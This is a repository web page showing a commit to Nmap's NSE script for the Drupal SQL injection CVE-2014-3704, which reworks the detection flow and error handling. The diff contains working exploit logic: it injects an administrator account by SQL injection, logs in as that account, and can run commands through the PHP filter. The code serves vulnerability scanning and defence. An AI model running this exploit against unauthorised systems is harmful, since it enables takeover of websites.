PenTest/nmap
1
0
Fork 0
mirror of https://github.com/nmap/nmap.git synced 2025-12-06 12:41:29 +00:00
Code Issues Projects Releases Wiki Activity

Improves detection of cve-2014-3704. Fixes #902. Closes #905.

Browse Source
This commit is contained in:
rewanth
2017-07-08 03:11:45 +00:00
parent d1e8388b7e
commit 30f0fab5bc
1 changed files with 44 additions and 29 deletions
Download Patch File Download Diff File Expand all files Collapse all files

47
scripts/http-vuln-cve2014-3704.nse
View File

@@ -216,11 +216,13 @@ local function do_sql_query(host, port, uri, user)
} }
} }
local res = http.post(host, port, uri .. "?q=/user/login", opt, nil, r) local res = http.post(host, port, uri .. "?q=/user/login", opt, nil, r)
--TODO: Check return status
if string.match(res.body, "includes[\\/]database[\\/]database%.inc") and string.match(res.body, "addcslashes%(%)") then
return user, passwd return user, passwd
end end
end
local function set_php_filter(host, port, uri, session, disable) local function set_php_filter(host, port, uri, session, disable)
-- enable PHP filter -- enable PHP filter
@@ -342,19 +344,6 @@ action = function(host, port)
cleanup = "false" cleanup = "false"
end end
local user, passwd = do_sql_query(host, port, uri, nil)
stdnse.debug(1, string.format("logging in as admin user (username: '%s'; passwd: '%s')", user, passwd))
local data = {
['name'] = user,
['pass'] = passwd,
['form_id'] = 'user_login',
['op'] = 'Log in',
}
local res = http.post(host, port, uri .. "?q=/user/login", nil, nil, data)
if res.status == 302 and res.cookies[1].name ~= nil then
local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port) local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = { local vuln = {
title = 'Drupal - pre Auth SQL Injection Vulnerability', title = 'Drupal - pre Auth SQL Injection Vulnerability',
@@ -375,9 +364,30 @@ attacks via an array containing crafted keys.
disclosure = {year = '2014', month = '10', day = '15'}, disclosure = {year = '2014', month = '10', day = '15'},
}, },
} }
stdnse.debug(1, string.format("logged in as admin user (username: '%s'; passwd: '%s'). Target is vulnerable.", user, passwd))
local user, passwd = do_sql_query(host, port, uri, nil)
if user == nil or passwd == nil then
return vulnReport:make_output(vuln)
end
stdnse.debug(1, string.format("logging in as admin user (username: '%s'; passwd: '%s')", user, passwd))
vuln.state = vulns.STATE.EXPLOIT vuln.state = vulns.STATE.EXPLOIT
local data = {
['name'] = user,
['pass'] = passwd,
['form_id'] = 'user_login',
['op'] = 'Log in',
}
local res = http.post(host, port, uri .. "?q=/user/login", nil, nil, data)
if res.status == 302 and res.cookies[1].name ~= nil then
stdnse.debug(1, string.format("logged in as admin user (username: '%s'; passwd: '%s'). Target is vulnerable.", user, passwd))
if cmd ~= nil then if cmd ~= nil then
local session = {} local session = {}
session.name = res.cookies[1].name session.name = res.cookies[1].name
@@ -406,11 +416,16 @@ attacks via an array containing crafted keys.
end end
end end
else
vuln.state = vulns.STATE.LIKELY_VULN
vuln.check_results = "Account created but unable to log in."
end
-- cleanup: remove admin user -- cleanup: remove admin user
if cleanup == nil then if cleanup == nil then
do_sql_query(host, port, uri, user) do_sql_query(host, port, uri, user)
end end
return vulnReport:make_output(vuln) return vulnReport:make_output(vuln)
end
end end